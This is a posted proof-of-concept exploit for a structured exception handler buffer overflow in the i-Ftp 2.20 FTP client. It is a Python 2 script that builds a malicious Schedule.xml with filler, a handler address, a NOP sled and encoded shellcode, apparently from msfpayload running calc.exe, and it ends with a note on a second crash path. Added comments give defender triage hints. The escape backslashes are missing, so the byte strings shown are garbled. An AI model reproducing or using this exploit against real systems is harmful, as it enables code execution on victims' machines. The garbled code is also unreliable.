
i-Ftp 2.20 Buffer Overflow

Posted on 07 November 2014

#!/usr/bin/python
#Exploit Title:i-FTP Buffer Overflow SEH
#Homepage:http://www.memecode.com/iftp.php
#Software Link:www.memecode.com/data/iftp-win32-v220.exe
#Version:i.Ftp v2.20 (Win32 Release)
#Vulnerability discovered:26.10.2014
#Description:Simple portable cross platform FTP/SFTP/HTTP client.
#Tested on:Win7 32bit EN-Ultimate - Win8.1-DE 64bit - Win XPsp3-EN
#Exploit Author:metacom --> twitter.com/m3tac0m
#
# Purpose: proof-of-concept generator. It writes a Schedule.xml file whose
# single Event element carries an oversized Time attribute (padded to 20000
# characters); per the title, i-Ftp 2.20 overflows a buffer when it reads
# that file and an SEH record is overwritten.
#
# NOTE(review): this is Python 2 (print statements). The backslashes of the
# escape sequences and of the Windows path in the messages appear to have
# been lost when the page was extracted, so every "xNN" below is literal
# text exactly as shown on the page.
#
# Defender notes:
#  - File artefact: a Schedule.xml in the i.Ftp program folder whose Event
#    Time attribute is thousands of characters long instead of a time value.
#    A size or attribute-length check on that file is a cheap triage signal.
#  - Process artefact: the author's generator comment names a calc.exe demo
#    payload, so a child process started by the FTP client right after
#    launch is the behaviour to alert on.
#  - The page names no fixed version; removing or replacing the affected
#    client is the only remediation that can be stated from this listing.
import struct

def little_endian(address):
  # Pack a 32-bit address as 4 little-endian bytes ("<L").
  return struct.pack("<L",address)

# Layout, per the title and the author's inline comment: filler up to the
# SEH record, a 4-byte field, the packed handler address, padding, then the
# encoded payload.
poc ="x41" * 591
poc+="xebx06x90x90"
# NOTE(review): presumably this address lies in a module loaded without
# SafeSEH/ASLR -- the page does not say which module; confirm before relying
# on it for a detection signature.
poc+=little_endian(0x1004C31F)#1004C31F 5E POP ESI
poc+="x90" * 80
# msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R
#| msfencode -e x86/alpha_upper -b "x00x0ax0dx20x22" -t c
# Opaque encoded payload; its content is taken on trust from the generator
# comment above and is not verified here.
poc+=("x89xe7xdaxcexd9x77xf4x58x50x59x49x49x49x49x43"
"x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34"
"x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41"
"x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58"
"x50x38x41x43x4ax4ax49x4bx4cx4bx58x4dx59x35x50"
"x53x30x55x50x43x50x4dx59x4dx35x46x51x39x42x55"
"x34x4cx4bx51x42x30x30x4cx4bx51x42x44x4cx4cx4b"
"x51x42x32x34x4cx4bx54x32x31x38x44x4fx58x37x30"
"x4ax57x56x50x31x4bx4fx36x51x4fx30x4ex4cx57x4c"
"x33x51x43x4cx44x42x46x4cx31x30x4fx31x58x4fx44"
"x4dx45x51x38x47x5ax42x5ax50x31x42x46x37x4cx4b"
"x46x32x42x30x4cx4bx30x42x47x4cx55x51x48x50x4c"
"x4bx51x50x44x38x4bx35x39x50x44x34x30x4ax53x31"
"x48x50x46x30x4cx4bx51x58x35x48x4cx4bx51x48x57"
"x50x45x51x58x53x4bx53x47x4cx47x39x4cx4bx37x44"
"x4cx4bx53x31x58x56x50x31x4bx4fx36x51x4fx30x4e"
"x4cx59x51x58x4fx54x4dx43x31x39x57x56x58x4bx50"
"x33x45x4bx44x43x33x43x4dx5ax58x47x4bx53x4dx31"
"x34x52x55x4ax42x50x58x4cx4bx50x58x57x54x43x31"
"x49x43x55x36x4cx4bx44x4cx30x4bx4cx4bx30x58x45"
"x4cx55x51x58x53x4cx4bx34x44x4cx4bx43x31x38x50"
"x4cx49x30x44x31x34x57x54x51x4bx31x4bx53x51x30"
"x59x51x4ax36x31x4bx4fx4bx50x36x38x51x4fx51x4a"
"x4cx4bx55x42x4ax4bx4dx56x51x4dx42x4ax53x31x4c"
"x4dx4bx35x58x39x33x30x35x50x33x30x56x30x33x58"
"x30x31x4cx4bx42x4fx4dx57x4bx4fx39x45x4fx4bx4b"
"x4ex44x4ex56x52x5ax4ax53x58x39x36x4dx45x4fx4d"
"x4dx4dx4bx4fx38x55x47x4cx34x46x33x4cx54x4ax4b"
"x30x4bx4bx4bx50x53x45x45x55x4fx4bx50x47x52x33"
"x42x52x42x4fx42x4ax55x50x31x43x4bx4fx4ex35x53"
"x53x55x31x32x4cx45x33x46x4ex52x45x44x38x52x45"
"x55x50x41x41")
# Pad the attribute value out to a fixed total of 20000 characters.
poc+="x90" * (20000 - len(poc))

# Read as hex escapes, the header spells an XML prolog, a <Schedule> root and
# an <Event> element with an empty Url attribute and a Time attribute left
# open after "http://"; poc is appended as that attribute's value.
header = "x3cx3fx78x6dx6cx20x76x65x72x73x69x6fx6ex3dx22x31x2ex30x22x20x65x6ex63x6fx64x69x6ex67x3dx22"
header += "x55x54x46x2dx38x22x20x3fx3ex0ax3cx53x63x68x65x64x75x6cx65x3ex0ax09x3cx45x76x65x6ex74x20x55"
header += "x72x6cx3dx22x22x20x54x69x6dx65x3dx22x68x74x74x70x3ax2fx2fx0a" + poc
# The footer closes the Time attribute, adds an empty Folder attribute and
# closes the Event and Schedule elements.
footer = "x22x20x46x6fx6cx64x65x72x3dx22x22x20x2fx3ex0ax3cx2fx53x63x68x65x64x75x6cx65x3ex0a"

exploit = header + footer
filename = "Schedule.xml"
# Written to the current directory; the messages below tell the tester to
# copy it into the application's folder by hand.
file = open(filename , "w")
file.write(exploit)
print " [*]Vulnerable Created Schedule.xml!"
print "[*]Copy Schedule.xml to C:Program FilesMemecodei.Ftp"
print "[*]Start IFTP"
print "[*]----------------------------------------------------"
file.close()
# Author's note on a second crash, reached through the HTTP Download "FILE"
# option with the same oversized input; the !exchain output shows the
# exception chain overwritten with 41414141.
print ''' [+]Second Vulnerability [-]You can also enter the contents 20000 A of the file in the --> * HTTP -> HTTP Download --> Option "FILE" to cause this crash * Access violation - code c0000005 (!!! second chance !!!) * 0:003> !exchain * 016fff2c: 41414141 * Invalid exception stack at 41414141'''

 
